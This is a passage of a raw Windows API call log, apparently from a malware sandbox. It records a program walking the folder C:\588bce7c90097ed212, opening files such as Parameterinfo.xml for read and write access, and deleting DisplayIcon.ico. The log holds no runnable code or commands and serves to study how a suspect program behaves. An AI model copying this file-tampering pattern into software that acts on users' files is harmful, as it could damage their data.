(hFile=0x428) returned 0x1 [0074.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0074.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0074.107] GetLastError () returned 0xb7 [0074.107] SetLastError (dwErrCode=0xb7) [0074.108] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0074.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0074.108] CloseHandle (hObject=0x428) returned 1 [0074.109] AreFileApisANSI () returned 1 [0074.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0074.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d4d0 [0074.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0074.109] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.110] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x0, cFileName="Extended", cAlternateFileName="")) returned 1 [0074.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0074.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0074.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.111] AreFileApisANSI () returned 1 [0074.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Extended", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Extended", lpUsedDefaultChar=0x0) returned 31 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.111] AreFileApisANSI () returned 1 [0074.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0074.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53838 [0074.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended") returned 31 [0074.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended" (normalized: "c:\\588bce7c90097ed212\\extended"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.112] GetLastError () returned 0x5 [0074.112] GetLastError () returned 0x5 [0074.112] SetLastError (dwErrCode=0x5) [0074.112] GetLastError () returned 0x5 [0074.112] SetLastError (dwErrCode=0x5) [0074.112] GetLastError () returned 0x5 [0074.112] SetLastError (dwErrCode=0x5) [0074.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.112] AreFileApisANSI () returned 1 [0074.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0074.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53718 [0074.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended") returned 31 [0074.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended" (normalized: "c:\\588bce7c90097ed212\\extended"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.112] GetLastError () returned 0x5 [0074.112] GetLastError () returned 0x5 [0074.112] SetLastError (dwErrCode=0x5) [0074.112] GetLastError () returned 0x5 [0074.112] SetLastError (dwErrCode=0x5) [0074.112] GetLastError () returned 0x5 [0074.113] SetLastError (dwErrCode=0x5) [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.113] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Graphics", cAlternateFileName="")) returned 1 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0074.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.113] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x780d0 [0074.114] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.114] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0074.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0074.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0074.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0074.115] AreFileApisANSI () returned 1 [0074.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 49 [0074.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0074.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0074.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.115] AreFileApisANSI () returned 1 [0074.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0074.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46668 [0074.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x46668, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0074.115] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.115] GetFileType (hFile=0x410) returned 0x1 [0074.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0074.115] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0074.116] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0074.116] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0074.116] CloseHandle (hObject=0x410) returned 1 [0074.116] AreFileApisANSI () returned 1 [0074.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0074.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46828 [0074.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0074.116] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.116] GetFileType (hFile=0x410) returned 0x1 [0074.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0074.116] CloseHandle (hObject=0x410) returned 1 [0074.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0074.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0074.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0074.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0074.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0074.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 